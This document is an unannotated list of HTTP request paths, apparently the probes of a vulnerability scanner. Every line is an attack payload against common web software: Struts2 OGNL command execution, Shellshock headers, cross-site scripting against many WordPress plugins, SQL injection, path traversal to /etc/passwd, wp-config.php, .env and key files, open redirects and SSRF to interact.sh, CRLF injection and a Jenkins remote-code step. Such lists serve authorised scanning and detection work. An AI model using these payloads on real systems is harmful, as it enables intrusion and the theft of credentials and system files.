/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/cgibin/webproc
/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1)
/CMSPages/GetDocLink.ashx?link=https://interact.sh/
/fw/mindex.do?url=./WEB-INF/web.xml%3f
/spaces/viewdefaultdecorator.action?decoratorName
/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype
/system/console?.css
/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported
/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22
/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22
/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/status, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/cgi-bin/stats, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/cgi-bin/test, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/cgi-bin/status/status.cgi, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/test.cgi, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/debug.cgi, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/cgi-bin/test-cgi, referrer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd
/wp-content/plugins/wsecure/wsecure-config.php
/login?redir=http://www.interact.sh
/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/~user/%0D%0ASet-Cookie:crlfinjection
/dompdf.php?input_file=php://filter/resource=/etc/passwd
/BSW_cxttongr.htm
/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd
/cgi-bin/;cat$IFS/etc/passwd
/servlets/FetchFile?fileName=../../../etc/passwd
/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/cgi-bin/logoff.cgi
/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/command/prima-factory.cgi
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match
/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/fileserver/2Y9k9q1fpurdlTB4vRmRqp9bhkQ.txt
/resource/file%3a///etc/passwd/
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/javax.faces.resource/dynamiccontent.properties.xhtml
/%5C../ssl/yaws-key.pem
/services/getFile.cmd?userfile=config.xml
/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1
/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php
/rest/v1/AccountService/Accounts
/gsearch.php.en?prod=';prompt`document.domain`;//
/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/xda/help/en/default.htm?startat=//oast.me
/remote/loginredir?redir=javascript:alert(document.domain)
/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/2Y9kA48gnPdklI4B9O8fwn6j9pj.jsp
/webadmin/pkg?command=<script>alert(document.cookie)</script>
/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
/invoker/JMXInvokerServlet/
/invoker/EJBInvokerServlet/
/invoker/readonly
/maint/index.php?packages
/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english
/2Y9k9hcSTugyDXKMv01ffI1xtZZ.php%5Cx0A
/.env
/.../.../.../.../.../.../.../.../.../windows/win.ini
/.../.../.../.../.../.../.../.../.../etc/passwd
/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1
/plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
/CMSInstall/install.aspx
/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh
/passwordrecovered.cgi?id=VSVwL
/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C
/system/deviceInfo?auth=YWRtaW46MTEK
/current_config/passwd
/current_config/Sha1Account1
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1)
/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)
/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/integration/saveGangster.action
/__
/wp-json/wp/v2/users/
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/clients/editclient.php?id=2Y9k9mruoDHsa5LUyY48qkUAGiP&action=update
/logos_clients/2Y9k9mruoDHsa5LUyY48qkUAGiP.php
/hw-sys.htm
/dumpmdm.cmd
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/base_import/static/c:/windows/win.ini
/struts2-rest-showcase/orders/3
/base_import/static/etc/passwd
/jolokia/read/getDiagnosticOptions
/orders/3
/cobbler_api
/sympa?referer=http://interact.sh&passwd&previous_action&action=login&action_login&previous_list&list&email
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/command.cgi?cat%20/etc/passwd
/dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print
/global-protect/login.esp?user=j%22;-alert(1)-%22x
/uir//etc/passwd
/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/admin/index.php?id=pages
/upload/index.php?route=extension/payment/divido/update
/users/registration
/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
//interact.sh
/img.php?f=/./etc/./passwd
/cgi-bin/login?LD_DEBUG=files
/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/api/external/7.0/system.System.get_infos
/echo-server.html?code=test&state=http://www.interact.sh
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/html/log
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?op=fileviewer&file=/etc/passwd
/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/__raw/services/server/info/server-info?output_mode=json
/jkstatus
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/jkstatus;
/verify.php?id=1&confirm_hash
/mantis/verify.php?id=1&confirm_hash
/mantisBT/verify.php?id=1&confirm_hash
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/mantisbt-2.3.0/verify.php?id=1&confirm_hash
/bugs/verify.php?confirm_hash&id=1
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/account
/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/account
//www.interact.sh
/filemanager/upload.php
/.../.../.../.../.../.../.../.../.../windows/win.ini
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/..../..../..../..../..../..../..../..../..../windows/win.ini
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/IntellectMain.jsp?IntellectSystem=https://www.interact.sh
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD
/fcgi-bin/wgsetcgi
/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue
/session/login
/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>
/login?next=http://interact.sh/?app.scan/
/signup?next=http://interact.sh/?app.scan/
/wp-admin/admin-ajax.php
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2Y9k9qDX23DIXflC2DmDkTdyVWF.jsp
/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/blast/nph-viewgif.cgi?../../../../etc/passwd
/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1
/web/google_analytics.php
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa
/wp-admin/admin.php
/select_project.php?url=http://interact.sh
/clock_status.php?current_page=http://interact.sh
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/plus/feedback.php/rp4hu%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E?aid=3
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2Y9k9hvF1ZFcv4Sgbrg5Tz1fyPF/)%3B%3C%2Fscript%3E%3C
/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
